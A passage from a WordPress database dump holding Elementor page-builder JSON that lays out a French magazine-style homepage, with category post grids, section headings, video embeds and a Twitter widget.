"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"category\":[\"2\"],\"excerpt_value\":10},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2419,773,'_elementor_version','0.4'),(2420,773,'_elementor_css','a:3:{s:4:\"time\";i:1509378870;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2422,775,'_elementor_edit_mode','builder'),(2423,775,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\